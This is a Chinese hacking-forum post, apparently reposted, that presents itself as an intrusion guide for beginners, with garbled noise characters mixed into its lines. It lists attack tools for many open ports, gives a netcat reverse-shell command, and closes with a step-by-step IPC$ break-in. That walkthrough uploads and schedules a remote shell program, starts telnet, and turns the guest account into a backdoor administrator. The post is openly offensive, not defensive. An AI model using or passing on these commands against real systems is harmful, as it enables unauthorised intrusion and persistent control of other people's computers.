TA的每日心情 | 衰 2019-8-18 09:37 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu
8 s+ U+ e: r, N$ z1 C, a/ S7 Q希望对新手入侵有帮助! 4 W+ M1 o/ |; l- f6 l2 T* w
1. 1433端口入侵
8 I8 u& S0 H. | i scanport.exe 查有1433的机器$ F: L& t( t4 r% K8 h1 r' M
SQLScanPass.exe 进行字典暴破(字典是关键)7 z5 ~; Z8 V, X% i
最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
* C' v& n6 B5 O% G9 a3 e/ F nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
+ y7 D* D# `9 P# }5 C9 w2 @ (以上反向的,测试成功)
- x) |, [$ w1 C' h2 T, ]2 V sqlhelloz.exe 入侵ip 1433 (这个是正向连接). y h* Z. g5 t9 y+ J7 ^
2. 4899端口入侵
2 p7 w$ W6 ?! O8 A/ m 用4899过滤器.exe,扫描空口令的机器
. t8 e" m# x1 N% X6 Q5 J/ g 3. 3899的入侵
" ?# }1 }0 Z" d4 d0 }; ]) X 对很早的机器,可以试试3389的溢出(win3389ex.exe)
8 D; [* U6 c" Q 对2000的机器,可以试试字典暴破。(tscrack.exe): N! Y& Y* I ^( G
4. 80入侵
, O8 @! q3 z) m( t, I 对sp3以前的机器,可以用webdav入侵;5 \& ]+ w3 x2 g
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
# s9 p8 x% b& L 可以利用SQL进行注入。(啊D的注入软件)。 E3 P n1 f& R7 b" }
5. serv-u入侵(21端口)
! v5 u$ v# r$ O: ^ 对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
% U& T' S- @' Y6 u6 D% L 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
; }# I3 }- z1 A {7 w7 c; o 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)7 V; t, ~! R1 O1 x( Z/ x% S
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码7 `$ x! Z: ]- u
6. 554端口* y) ^: T" t( U$ l' F) x9 l4 q0 \" l
用real554.exe入侵。
' n. v. c: T% A# j 7. 6129端口1 X# X2 G0 E, `6 `( Y0 U
用DameWare6129.exe入侵。$ c8 k: r1 d" z0 g V
8. 系统漏洞* G% v: d L, L: `
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
% q8 p' ?2 T- Q! B" q9. 3127等端口
% Y* V/ K, y$ V7 G- T3 r$ }% \0 a( x k: \. D( n
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。4 x( n! M1 G; H a9 z% x& g
10. 其他入侵
6 }3 v9 |8 v+ B 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。7 X$ w& C6 R4 d% {
& m8 k4 r9 h! N4 H9 Y* `) e# n
经典IPC$入侵
8 v/ `' G! r/ b; ^1 T
* L4 W7 F* l; z8 W1 t! H 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
& t S4 v- E- J6 R8 r8 ]8 e 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
- n' B2 x( N- h& B6 k: N 2. C:\>copy srv.exe $">\\127.0.0.1\admin$
' G( U/ N2 t& C# L$ q4 U1 d; W 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
9 A1 l* I+ g- C# N3 Y6 T 3. C:\>net time file://127.0.0.1/' n% N$ J7 o: m) d; \
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
) h. Q& b8 y" U- Z1 ~ 4. C:\>at file://127.0.0.1/ 11:05 srv.exe
" _- p+ r/ z: B$ |2 N8 K 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
1 V* s: g0 b) p. l# ?- [& Z. z 5. C:\>net time file://127.0.0.1/& Q8 c. b% e+ }
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
0 k( e* ?& X h2 r6 J 6. C:\>telnet 127.0.0.1 99+ N0 ^5 v9 W6 Q5 z
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。" D3 j8 o5 J$ Q2 A' Q, z
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了% ]6 q+ w5 l% f
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$/ r% A1 U0 L6 b* O2 K _
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
0 K# N: R5 v4 z- y* @. { 8. C:\WINNT\system32>ntlm1 U4 v4 Q( M) @2 k' x1 P v+ K
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
3 x9 M8 p( n/ _# f 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组% g2 x3 x5 l2 R. }* F
10. C:\>net user guest /active:yes& |- z/ I. k0 y' G4 L5 G
将对方的Guest用户激活6 B; T9 \6 d% _) h+ t" J
11. C:\>net user guest 1234
1 k( `8 D7 v( `4 i4 W4 p$ Q 将Guest的密码改为1234,或者你要设定的密码
: [. X5 S! I( h3 } C) a 12. C:\>net localgroup administrators guest /add
% R) ~# F, M, d& B7 y# M: d/ X2 ~ 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|